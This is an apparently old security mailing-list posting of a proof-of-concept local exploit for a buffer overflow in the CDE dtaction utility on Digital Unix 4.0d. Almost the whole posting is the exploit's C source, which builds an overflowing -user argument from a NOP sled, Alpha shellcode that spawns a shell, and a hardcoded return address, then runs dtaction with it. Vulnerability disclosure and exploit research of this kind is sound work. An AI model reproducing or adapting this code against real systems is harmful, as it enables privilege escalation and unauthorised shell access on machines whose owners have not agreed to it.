Digital Unix CDE dtaction vulnerability concept of proof code

[SeungHyun Seo <s1980914@inhavision.inha.ac.kr>]

Digital Unix 4.0d CDE dtaction vulnerability exploitable.
concept of proof code follows


/*
 * dtaction-ex.c
 * tested : Digital Unix 4.0d , OSF1  V4.0 878 alpha
 *
 * cc -o dtaction-ex dtaction-ex.c
 *
 * truefinder , seo@igrus.inha.ac.kr, seo@underground.or.kr
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOP             0x47ff041f
#define ALIGNSIZE       (9)
#define BUFSIZE         (8199 )
#define RETADDR         0x000000011ffffaa0
#define DEFNOPSIZE      7168

char nop[] = { 0x1f, 0x04, 0xff, 0x47, 0x00 };
char retaddr[] = { 0xa0, 0xea, 0xff, 0x1f, 0x01 , 0x00 };

static char shellcode[] =
        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
        "\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */
        "\x12\x94\x07\x42"      /* addq $16,60,$18              */
        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
        "\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */
        "\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */
        "\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */
        "\xf9\xff\x1f\xd2"      /* bsr $16,-28                  */
        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
        "\x31\x15\xd8\x43"      /* subq $30,192,$17             */
        "\x12\x04\xff\x47"      /* clr $18                      */
        "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
        "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
        "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
        "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
        "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
        "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
        "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
        "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
        "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
        "\x13\x94\xe7\x43"      /* addq $31,60,$19              */
        "\x20\x35\x60\x42"      /* subq $19,1,$0                */
        "\xff\xff\xff\xff";     /* callsys ( disguised )        */
        /* ohhara's shellcode */

int 
main(int argc, char  *argv[] )
{

        char *buf , *buf_ptr;
        int bufsize , alignsize , offset ;
        int i, totalsize;
        
        bufsize = BUFSIZE ; alignsize = ALIGNSIZE ; offset = 0 ;

        totalsize = alignsize + bufsize ;
         buf = malloc( totalsize ) ;


        memset ( buf, NULL , totalsize );

        memset ( buf, 'A', alignsize );
        buf_ptr = (char *)(buf + alignsize );

        for ( i = 0 ; i < DEFNOPSIZE/4 ; i++ )
                strcat ( buf_ptr , nop );

        strcat ( buf_ptr, shellcode );

        for ( i =0 ; i < bufsize - DEFNOPSIZE - strlen(shellcode) - 8 ;
i++ )
                strcat( buf_ptr ,"A");

        strcat ( buf_ptr , retaddr );
 
        execl ("/usr/dt/bin/dtaction", "dtaction", "-user",  buf, NULL );  
}



--
Seunghyun Seo , Inha university Group of Research for Unix Security
[e-mail] seo@igrus.inha.ac.kr, seo@underground.or.kr